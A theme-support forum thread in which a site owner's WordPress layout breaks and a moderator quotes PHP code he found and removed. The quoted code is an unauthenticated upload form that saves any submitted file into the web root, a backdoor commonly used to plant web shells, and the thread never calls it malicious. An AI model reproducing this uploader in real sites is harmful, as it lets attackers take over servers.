New Landing How can we help? Themeforest Theme Support Neighborhood Everything is expanded and menu bar is vertical

Viewing 8 posts - 1 through 8 (of 8 total)
  • #144192
    JimRolighed
    Member
    Post count: 13

    Hi, I am having a problem that I hope that you can help with.

    On the front page of http://www.wasps.dk the first problem is that everything is expanded. The next problem is that the menubar is vertical instead of horizontal. Also the Logo on the top is showing double. I have no idea what could have happened, I believe that it is just one button set wrong, or at least i hope that it is. I hope that you can help me.

    /jim

    #144241
    Mohammad – SUPPORT
    Moderator
    Post count: 27441

    Hi,
    I have resolved the issue so please check after clear the cache of browser. You have inserted some php code and removed css code that is cause to issue.

    <?php
    if(isset($_POST['Submit'])){
        $filedir = ""; 
        $maxfile = '2000000';
    
        $userfile_name = $_FILES['image']['name'];
        $userfile_tmp = $_FILES['image']['tmp_name'];
        if (isset($_FILES['image']['name'])) {
            $abod = $filedir.$userfile_name;
            @move_uploaded_file($userfile_tmp, $abod);
      
    echo"<center><b>Done ==> $userfile_name</b></center>";
    }
    }
    else{
    echo'
    <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
    }
    ?>

    Thanks
    Mohammad

    #144251
    JimRolighed
    Member
    Post count: 13

    Hi Mohammad,

    Thank you for your assistance, it works great now.

    I did not insert or remove any code, so something else must have caused it. Anyway, I am greatful for your help 🙂

    #144278
    Mohammad – SUPPORT
    Moderator
    Post count: 27441

    Hi,
    You most welcome.
    Thanks
    Mohammad

    #153070
    JimRolighed
    Member
    Post count: 13

    Hi Mohammad,

    you helped me with this issue some weeks ago, but somehow it has returned. I am not sure how. Could you tell me more specifically the file where you found the code which caused the issue?

    I know it is a while ago, but maybe you remember.

    #153334
    Mohammad – SUPPORT
    Moderator
    Post count: 27441

    Hi,
    Your website seems to fine to me.
    Thanks
    Mohammad

    #153361
    JimRolighed
    Member
    Post count: 13

    Hi Mohammad,

    We have just fixed it, it was in the child theme. We just deleted that and changed the theme to standard neighborhood. Thank you for checking on it.

    #153362
    Rui Guerreiro – SUPPORT
    Keymaster
    Post count: 25779

    Glad it’s sorted. Thanks Mohammad
    -Rui

Viewing 8 posts - 1 through 8 (of 8 total)

You must be logged in and have valid license to reply to this topic.

License required for one of the following items
Login and Registration Log in · Register